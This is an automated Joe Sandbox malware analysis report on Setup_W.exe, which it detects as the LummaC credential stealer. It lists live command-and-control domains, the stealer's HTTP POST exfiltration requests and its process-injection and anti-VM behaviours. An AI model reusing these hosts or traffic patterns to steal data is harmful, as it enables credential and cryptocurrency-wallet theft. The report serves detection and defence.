Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup_W.exe

Overview

General Information

Sample name:Setup_W.exe
Analysis ID:1580153
MD5:bcb408aad4a09a615ecaab20c8016c3b
SHA1:5b6885e46d0ee42bc1ff8f3c503c95d72e7b2882
SHA256:d53658877443a27b1e4e5abfdf79717493343f21b824db045d5bfff67302465c
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup_W.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\Setup_W.exe" MD5: BCB408AAD4A09A615ECAAB20C8016C3B)
    • BitLockerToGo.exe (PID: 7680 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["aspecteirs.lat", "necklacebudi.lat", "crosshuaht.lat", "sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "discokeyus.lat", "energyaffai.lat", "mooncobudy.click"], "Build id": "Jwquln--2112YT"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000003.2145451743.00000000032DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
        • 0x0:$x1: 4d5a9000030000000
        00000004.00000003.2145593469.00000000032DD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 7680JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: BitLockerToGo.exe PID: 7680JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:56:35.575963+010020283713Unknown Traffic192.168.2.449736104.21.44.57443TCP
              2024-12-24T02:56:37.836660+010020283713Unknown Traffic192.168.2.449737104.21.44.57443TCP
              2024-12-24T02:56:40.466376+010020283713Unknown Traffic192.168.2.449738104.21.44.57443TCP
              2024-12-24T02:56:43.149298+010020283713Unknown Traffic192.168.2.449739104.21.44.57443TCP
              2024-12-24T02:56:45.506207+010020283713Unknown Traffic192.168.2.449740104.21.44.57443TCP
              2024-12-24T02:56:48.609961+010020283713Unknown Traffic192.168.2.449741104.21.44.57443TCP
              2024-12-24T02:56:51.052897+010020283713Unknown Traffic192.168.2.449742104.21.44.57443TCP
              2024-12-24T02:57:01.995879+010020283713Unknown Traffic192.168.2.449749104.21.44.57443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:56:36.609310+010020546531A Network Trojan was detected192.168.2.449736104.21.44.57443TCP
              2024-12-24T02:56:38.875868+010020546531A Network Trojan was detected192.168.2.449737104.21.44.57443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:56:36.609310+010020498361A Network Trojan was detected192.168.2.449736104.21.44.57443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:56:38.875868+010020498121A Network Trojan was detected192.168.2.449737104.21.44.57443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:56:44.090669+010020480941Malware Command and Control Activity Detected192.168.2.449739104.21.44.57443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T02:56:51.065678+010028438641A Network Trojan was detected192.168.2.449742104.21.44.57443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Setup_W.exeAvira: detected
              Source: 0.2.Setup_W.exe.9e84000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "necklacebudi.lat", "crosshuaht.lat", "sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "discokeyus.lat", "energyaffai.lat", "mooncobudy.click"], "Build id": "Jwquln--2112YT"}
              Source: Setup_W.exeVirustotal: Detection: 64%Perma Link
              Source: Setup_W.exeReversingLabs: Detection: 47%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: Setup_W.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: mooncobudy.click
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: mooncobudy.click
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: mooncobudy.click
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: mooncobudy.click
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString decryptor: Jwquln--2112YT
              Source: Setup_W.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: Setup_W.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.44.57:443
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: mooncobudy.click
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.44.57:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.44.57:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DGI840PD1ZFG7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FCOPZD72NDC4GNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QV6QGZ1BC3OZLY6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5QWPGMFUQQGVWBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1238Host: mooncobudy.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3HOQIICSEP9NRXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551433Host: mooncobudy.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: mooncobudy.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mooncobudy.click
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145610434.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292604362.00000000032D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/
              Source: BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/);
              Source: BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/I:
              Source: BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293855753.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169597412.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2182980470.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/api
              Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/api/
              Source: BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/api7
              Source: BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/apiD
              Source: BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/apiF9tl
              Source: BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/apiK
              Source: BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/apiO
              Source: BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/m
              Source: BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/s
              Source: BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/s):
